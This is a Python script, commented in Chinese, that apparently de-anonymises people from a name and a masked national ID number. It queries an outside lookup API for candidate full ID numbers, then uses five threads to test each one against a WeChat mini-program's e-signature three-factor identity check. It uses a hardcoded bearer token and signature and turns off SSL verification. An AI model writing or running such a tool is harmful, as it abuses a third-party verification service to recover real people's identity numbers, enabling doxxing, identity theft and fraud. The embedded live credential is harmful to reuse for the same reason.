import requests
import re
import json
import time
import urllib3
from concurrent.futures import ThreadPoolExecutor

# 第一个 API 接口地址
API_URL = "http://xkapi.of.kg/bq"
# 第二个请求的 URL
url = "https://gateway.9999jt.com/recycle/esignature/checkFactors3Create"

# 第一个 API 接口请求头
# 此处可添加,因原代码未体现,暂时无
# 第二个请求头
headers = {
    "Host": "gateway.9999jt.com",
    "Connection": "keep-alive",
    "Accept": "application/json",
    "xweb_xhr": "1",
    "Tua": "ILC-3.9.10&NA&Windows 11 x64&398_772&microsoft&microsoft&V1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090a13)XWEB/11581",
    "Authorization": "eyJhbGciOiJIUzUxMiJ9.eyJzZXJ2aWNlLW5hbWUiOiJtYW5hZ2UtcmVjeWNsZSIsInVzZXJfaWQiOjY4OTAxMjYsInVzZXJfa2V5IjoiMmY2NTExZTYtM2M5Ny00MDE4LTg0MzMtMWJkOGMxYTA0NjM0IiwidXNlcm5hbWUiOiJnXzMzNzU4NDI2In0.oIEk7o_vFcX7yeZSoE6D9f41c3RVILz-K1V2tRZLR3eKihWcZONik480-ukIS_HxHc9g8EdafRgLh-43U0kuZw",
    "credentials": "include",
    "Content-Type": "application/json",
    "Sec-Fetch-Site": "cross-site",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Dest": "empty",
    "Referer": "https://servicewechat.com/wxc89fda19b661572d/281/page-frame.html",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "zh-CN,zh;q=0.9"
}

# 禁用不安全请求警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# 用户输入名字和模糊身份证号
name = input("请输入名字:").strip()
idcard = input("请输入模糊身份证号:").strip()

# 构造第一个 API 接口的完整请求参数
params = {
    "name": name,
    "idcard": idcard,
    "key": "XRf6FZ2FpXm2"
}

try:
    # 发送第一个 API 的 GET 请求
    response = requests.get(API_URL, params=params)

    # 检查第一个 API 响应状态码
    if response.status_code == 200:
        # 获取响应内容
        response_text = response.text
        # 使用正则表达式提取身份证号
        idcards = re.findall(r'身份证:\s*(\d+)', response_text)
        unique_idcards = set(idcards)  # 使用集合去除重复的身份证号
        if unique_idcards:
            print("提取到的身份证号:")
            for id_num in unique_idcards:
                print(id_num)

            # 获取用户输入的姓名和手机号(用于第二个接口请求)
            name_for_check = input("请输入姓名:")
            phone = input("请输入手机号:")

            def send_request(id_card):
                # 第二个接口请求体
                data = {
                    "userId": 6890126,
                    "phone": phone,
                    "name": name_for_check,
                    "idCard": id_card.strip(),
                    "type": 1,
                    "authType": 1,
                    "idcardType": 1,
                    "way": "POST",
                    "method": "recycle/esignature/checkFactors3Create",
                    "timeStamp": int(time.time() * 1000),
                    "format": "json",
                    "appKey": "wxc89fda19b661572d",
                    "provider": "weixin",
                    "environment": "release",
                    "v": "1.0",
                    "sign": "79E3D14D136BE2DD149409A9E83F5877"
                }

                try:
                    # 发送第二个接口的 POST 请求,忽略 SSL 验证(不建议在生产环境使用)
                    response = requests.post(url, headers=headers, json=data, verify=False)
                    # 打印响应状态码
                    print(f"身份证号: {id_card.strip()}, 状态码: {response.status_code}")
                    # 打印响应内容
                    print(response.json())
                except requests.exceptions.RequestException as e:
                    print(f"身份证号: {id_card.strip()}, 请求发生错误: {e}")
                except json.JSONDecodeError as e:
                    print(f"身份证号: {id_card.strip()}, 解析响应数据失败: {e}")

            # 创建线程池,线程数为 5
            with ThreadPoolExecutor(max_workers=5) as executor:
                # 提交任务到线程池
                executor.map(send_request, unique_idcards)
        else:
            print("未提取到身份证号")
    else:
        print(f"第一个 API 请求失败,状态码: {response.status_code}")
except requests.RequestException as e:
    print(f"第一个 API 请求过程中发生错误: {e}")